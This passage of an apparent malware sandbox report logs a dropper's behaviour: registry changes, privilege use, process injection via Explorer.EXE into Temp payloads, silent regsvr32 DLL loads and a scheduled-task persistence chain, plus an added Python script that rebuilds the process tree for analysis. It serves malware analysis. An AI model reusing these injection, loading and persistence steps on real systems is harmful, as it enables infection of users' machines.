Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\61EA.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 4464 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 4464 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 220 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 220 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 220 wrote to memory of 5032 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 220 wrote to memory of 5032 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 220 wrote to memory of 5032 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3D65.exe
PID 3144 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3D65.exe
PID 3144 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3D65.exe
PID 3144 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\40B2.exe
PID 3144 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\40B2.exe
PID 3144 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\40B2.exe
PID 3144 wrote to memory of 4572 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4268.exe
PID 3144 wrote to memory of 4572 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4268.exe
PID 3144 wrote to memory of 4572 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4268.exe
PID 3144 wrote to memory of 1404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 3144 wrote to memory of 1404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 3144 wrote to memory of 1404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 3144 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\61EA.exe
PID 3144 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\61EA.exe
PID 3144 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\61EA.exe
PID 3144 wrote to memory of 4328 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3144 wrote to memory of 4328 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3144 wrote to memory of 4328 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3144 wrote to memory of 3084 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3144 wrote to memory of 3084 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3144 wrote to memory of 3084 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3144 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 3144 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 3144 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 468 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 468 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 3144 wrote to memory of 1076 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 1076 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 1076 wrote to memory of 2596 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1076 wrote to memory of 2596 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1076 wrote to memory of 2596 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 4308 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3144 wrote to memory of 4308 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3144 wrote to memory of 4308 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3144 wrote to memory of 212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\996B.exe
PID 3144 wrote to memory of 212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\996B.exe
PID 3144 wrote to memory of 212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\996B.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 3144 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9D73.exe
PID 3144 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9D73.exe
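
The rows above are emitted two or three times per child while the writing process sets the new process up, and the Target column always names that child, so once deduplicated they are a process tree. The script below is an added example, not part of the sandbox report: it parses a constructed subset of these rows (copied verbatim from the table) into a parent/child graph, reports the process with the most distinct children and prints the lineage of any PID. On this subset the hub is Explorer.EXE, PID 3144: every first-stage payload (3302.exe, the regsvr32 pairs, 5EFB.exe and the rest) is written to by the already-running shell rather than by the sample's own process, which is consistent with a loader that has injected into explorer.exe before dropping its payloads. The PID-to-image mapping comes only from these rows, and the code assumes a PID names one process for the whole run.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Suspicious use of WriteProcessMemory" rows from
# this report, copied verbatim, duplicates included (the sandbox logs two or three
# writes per child while the parent sets up the new process).
SAMPLE_ROWS = r"""
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 4464 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 468 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
"""

# Row layout: "PID <writer> wrote to memory of <target> N/A <writer image> <target image>"
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_rows(text):
    """Deduplicate the rows into a parent/child graph keyed by PID.

    Assumption: a PID names one process for the whole run; if the OS reused a PID
    during the detonation, two processes would be merged here.
    """
    image, parent, children, seen = {}, {}, defaultdict(list), set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank line or a row in an unexpected shape
        ppid, cpid = int(m.group(1)), int(m.group(2))
        image.setdefault(ppid, m.group(3))
        image.setdefault(cpid, m.group(4))
        if (ppid, cpid) in seen:
            continue  # repeated write from the same parent to the same child
        seen.add((ppid, cpid))
        children[ppid].append(cpid)
        parent.setdefault(cpid, ppid)  # the first writer is treated as the creator
    return {"image": image, "parent": parent, "children": dict(children)}


def roots(tree):
    """PIDs that write to others but were never written to: the top of each chain."""
    return sorted(p for p in tree["image"] if p not in tree["parent"])


def hub(tree):
    """The PID with the most distinct children, i.e. the process doing the spawning."""
    return max(tree["children"], key=lambda p: len(tree["children"][p]))


def lineage(tree, pid):
    """Chain of PIDs from a root down to pid."""
    chain = [pid]
    while chain[-1] in tree["parent"]:
        chain.append(tree["parent"][chain[-1]])
    return chain[::-1]


def render(tree, pid, depth=0):
    """Indented tree lines starting at pid."""
    lines = [f"{'  ' * depth}{pid} {tree['image'][pid]}"]
    for child in tree["children"].get(pid, []):
        lines.extend(render(tree, child, depth + 1))
    return lines


if __name__ == "__main__":
    tree = parse_rows(SAMPLE_ROWS)
    for root in roots(tree):
        print("\n".join(render(tree, root)))
    h = hub(tree)
    print(f"hub: {h} {tree['image'][h]} ({len(tree['children'][h])} children)")
    print("lineage of schtasks.exe:", " -> ".join(map(str, lineage(tree, 2280))))
```

Fed the full table, the regsvr32 pairs (system32 then SysWOW64) appear as two-level chains under 3144, and 5EFB.exe is the one first-stage payload with its own subtree: aafg31.exe alongside latestplayer.exe, then yiueea.exe, then the schtasks.exe call that registers the one-minute task for yiueea.exe shown in the Processes list.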

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\366E.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\366E.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\3824.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\3824.dll

C:\Users\Admin\AppData\Local\Temp\3D65.exe

C:\Users\Admin\AppData\Local\Temp\3D65.exe

C:\Users\Admin\AppData\Local\Temp\40B2.exe

C:\Users\Admin\AppData\Local\Temp\40B2.exe

C:\Users\Admin\AppData\Local\Temp\4268.exe

C:\Users\Admin\AppData\Local\Temp\4268.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\5EFB.exe

C:\Users\Admin\AppData\Local\Temp\5EFB.exe

C:\Users\Admin\AppData\Local\Temp\61EA.exe

